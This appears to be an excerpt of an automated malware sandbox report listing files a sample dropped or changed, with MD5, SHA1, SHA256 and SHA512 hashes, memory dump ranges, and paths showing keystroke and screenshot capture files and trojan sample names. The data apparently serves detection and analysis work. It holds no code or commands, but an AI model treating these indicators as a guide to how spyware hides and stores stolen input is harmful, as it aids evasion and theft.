| SHA256 | 7a978cba31e7b97b1a45c8260177d326c00731a807ba9f0c79bcf1a0164a5ffd |
| SHA512 | 8c9c39614089ee6aaf3a912ad3b33a6911f3e30032e60887acb7b224c85c556722518da5701737bff65ea544056c85e89ec8f348d749cc96c1f512cb084c26eb |
C:\Windows\directx.sys
| MD5 | 77520d556e3a06f6aaac38014206eea9 |
| SHA1 | 1c1ede506e107008ea758f519839aa79670e9898 |
| SHA256 | 38c1f50847c0397dd1df72e004be6890a8321882b791389ff7f3194ab01832c0 |
| SHA512 | ee6624917dd63483aff467ecac47b272dc1f1d0860392cedcd57904fa596f84caeccb82715585b92b1d99d3e577bd146493a60e4561cb03fdbb520a4a0f078a7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 679b442fd989fe1a21a1350a6b392474 |
| SHA1 | 52ae196569be98a38cd51f22c0347c5e2a2d8bd0 |
| SHA256 | 93f31065f567a5ac32f9d5be2bc30b82be0492476e8664db0d85033a98bd5e3b |
| SHA512 | dca4b5d4c8915295295c478134372cdecbfdc9882e97f633c6927cc76ec74f946cb82579f932ae065ecb3e6a0e536827aafa9b47f875f3f2b6f49cbcd2cb2a27 |
C:\Windows\directx.sys
| MD5 | 679710f8c95ff80d8b3a5fb56405fea2 |
| SHA1 | 63c2a2b1e9dbe8c26dd75e8a60b78969b3e2e01b |
| SHA256 | 07bb1c5babffb5815c366636ea749b45bc8259c00386bdb9b72dd503dd00c316 |
| SHA512 | 9dbca2dde6b0f8973ff6e5a9dfbb2ad46d47c672dcb5af63bb2d109d203dac3cc0859642a2278f3910d4fa5d3eed445bea29ad77fe914cab5399e901f5a15953 |
memory/464-4564-0x00000000050D0000-0x0000000005106000-memory.dmp
memory/464-4565-0x00000000058E0000-0x0000000005F0A000-memory.dmp
memory/464-4566-0x00000000055B0000-0x00000000055D2000-memory.dmp
memory/464-4567-0x0000000005850000-0x00000000058B6000-memory.dmp
memory/464-4568-0x0000000006040000-0x00000000060A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jvmea10w.rsg.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/464-4578-0x00000000060B0000-0x0000000006407000-memory.dmp
memory/464-4579-0x0000000006550000-0x000000000656E000-memory.dmp
memory/464-4580-0x0000000006590000-0x00000000065DC000-memory.dmp
memory/4032-4589-0x0000000007B10000-0x000000000818A000-memory.dmp
memory/4032-4590-0x00000000072F0000-0x000000000730A000-memory.dmp
C:\Windows\directx.sys
| MD5 | 950ccf7cafeda307c3243a1fd5eac997 |
| SHA1 | c05e2823fa22e606f0f79644147aee4ac526bb9b |
| SHA256 | dcf12029f93f03863d6db8539a6c2b43bcd64a91d711895ba1ce823ccdad49a6 |
| SHA512 | ed568d7042b4916fadcd63a588c3551a5900ab9b106ce18d83d7c996181c715a165faa94269b8f1cdf51df4cd2bb4109282d7c37d9b23abe80911e5958e5b8f4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | efc7d8c0d25f496869f049e39aeaccef |
| SHA1 | 1533cd2525f693ecab7e60fdb0cb91484e093317 |
| SHA256 | eb33fdcbffe34b9a2844636d1c50386454734c00b160912d90ff3117f9af5865 |
| SHA512 | 07642438f1ab955db38c578a4506cce2426d73af36378320ae62f9fc0f1a412ba07a8bf0ecf8a32bb4d3c4ab145435610d18c0f98628ffaa2bbfac40c9c15078 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | dedaad548f15a7f91dd81e525426e643 |
| SHA1 | 655b783b2c483266eedde856dfabea5f830bd60c |
| SHA256 | 31d1f44e71be2c30d1b6786b1abc571fdfcd177778a73fffe3b1c4c092168d21 |
| SHA512 | f54a0ef47257cb4c0f07f285b396266ea4ab7d3e665b36f8d629754a2a59e0ea339fdc6cce9c6d35593dd8320d1531bb1847608adc2ad41d81dd617635051208 |
C:\Users\Admin\AppData\Local\Temp\DB1
| MD5 | a182561a527f929489bf4b8f74f65cd7 |
| SHA1 | 8cd6866594759711ea1836e86a5b7ca64ee8911f |
| SHA256 | 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914 |
| SHA512 | 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558 |
C:\ProgramData\KMQ\TSH.001
| MD5 | 748042c7ffcb550d0fc8baf9cafb5c79 |
| SHA1 | eae4aafc6eb045171f99dba457fb0f358fdb8bce |
| SHA256 | 1c08d356565681eee5608ce184b639cfd4cfc5e50189079da8fb6267fbd2fde6 |
| SHA512 | 91070d068af70287f361e4925749ae096ffba3d50fcc186170890fa2147063c510ef252f3ed05949c3b70989be49f08a09977eb19203c2c75f7aed805684724e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 807116034efc863593ccdb82c8fa5646 |
| SHA1 | 45fa77982f64d940a16c9f93a6b70336e20ba387 |
| SHA256 | 31104d7007b360cbc412b173dc7dfc63c46218f496f9ddf73d4b572c283360ae |
| SHA512 | 52c0224bd343835a43d1d1cd38c86ba11b5ecd2b9abde2db78616afdc2c88e30ea2fbb6c08dd1628b50dd49e22f2a13f9a3569b0e1c03a43158669bc63d5ca8d |
C:\Users\Admin\AppData\Local\Temp\M2d9\IconCache3frdbf.exe
| MD5 | a02b404c77786816b91d6b1a11e0e1ff |
| SHA1 | eee6491c67af18743ef403b34fa61ab67bcf75f4 |
| SHA256 | 12682b2e7f9831339ab54913afd5fbbe42fb11af2c15d92f53776e5d45e50e94 |
| SHA512 | 6b628ee0612d1a5d3ad140fff2b46c76b6fd387c2eec2653b8c8f50794770225fb772d50d3aebc9a5d49411d16f61e27104a2220766c361788ba92a5e82ac276 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 555e2386dce925cda0a1ae2c7f47d06e |
| SHA1 | 7ac4b9d6d2c82424e46a116460ef1e45ccb53c3d |
| SHA256 | b7d83aae8dc2512c7e71ab84f2d23328d4a98a124f468afe5578117da4a56932 |
| SHA512 | 7a23d19ab1420d37677003c6331995e5b21c87d932e1f0cff993507b500777079de3ab5e5f7ac2b39f4d1303603198958d9080de10f25daa81b190272191148c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 1998d2f43aa84f82aa904fb9e5e957ff |
| SHA1 | 04972038a24999689a8a467182c1ddb35bb2368f |
| SHA256 | f80200546116aea1ed8eeab731c5e15c29eed30b19cb8c210e3bbaf55e832ae7 |
| SHA512 | 1fe1c127c14dfd744b70c1e57d53db748816bd14bc79fe9252def0d9825d3b1a8a92e83410349a58835efa3ace2002eb5a6cbf6909407700cd3c7d176a709d83 |
C:\ProgramData\KMQ\TSH.004
| MD5 | 65ac172a86648a11d9edb58afdfb112c |
| SHA1 | cbd6eaccca36fd6c6beeac1e59aa3b1bbd16e78d |
| SHA256 | 711f165f40ca72e6b786b181898b6866524f41ad3d4ec3b2b66e8cd06a8b0132 |
| SHA512 | 3475c131f729d11fe16061e1fa8d2d6ce4ec9527e07f37b0e3b9cf3f38e471e7ada4157bae58773a2f7b29ee71a77f63ca59898d52d2902d7ff97c82c18c1370 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Windows\directx.sys
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Windows\directx.sys
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Windows\directx.sys
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Windows\directx.sys
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2410826464-2353372766-2364966905-1000\0f5007522459c86e95ffcc62f32308f1_98bf7e79-8c75-4ee3-90d5-4fb9386da93e
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\ProgramData\KMQ\TSH.001
C:\Windows\directx.sys
C:\Users\Admin\Desktop\HEUR-T~4.EXE
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Temp\3582-490\HEUR-Trojan-Ransom.Win32.Blocker.vho-11123fd370dfdb5d9d5cade853fa923679377c7791bda00d2f415078e2729e65.exe
C:\Windows\directx.sys
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Temp\3582-490\HEUR-Exploit.Win32.ShellCode.vho-138c60f8df9c59cf59cbdfbf5004ceda539b0de2cd70207b79833805594a9746.exe
C:\Windows\directx.sys
C:\ProgramData\KMQ\TSH.001
C:\Windows\directx.sys
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\ProgramData\KMQ\TSH.004
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\ProgramData\KMQ\2024-11-19_14-14-05.005
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\ProgramData\KMQ\Keys_2024-11-19_14-04-26.html
C:\ProgramData\KMQ\App_2024-11-19_14-04-17.html
C:\ProgramData\KMQ\Screen_2024-11-19_14-14-05.html
C:\ProgramData\KMQ\Screen_2024-11-19_14-14-05.jpg
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences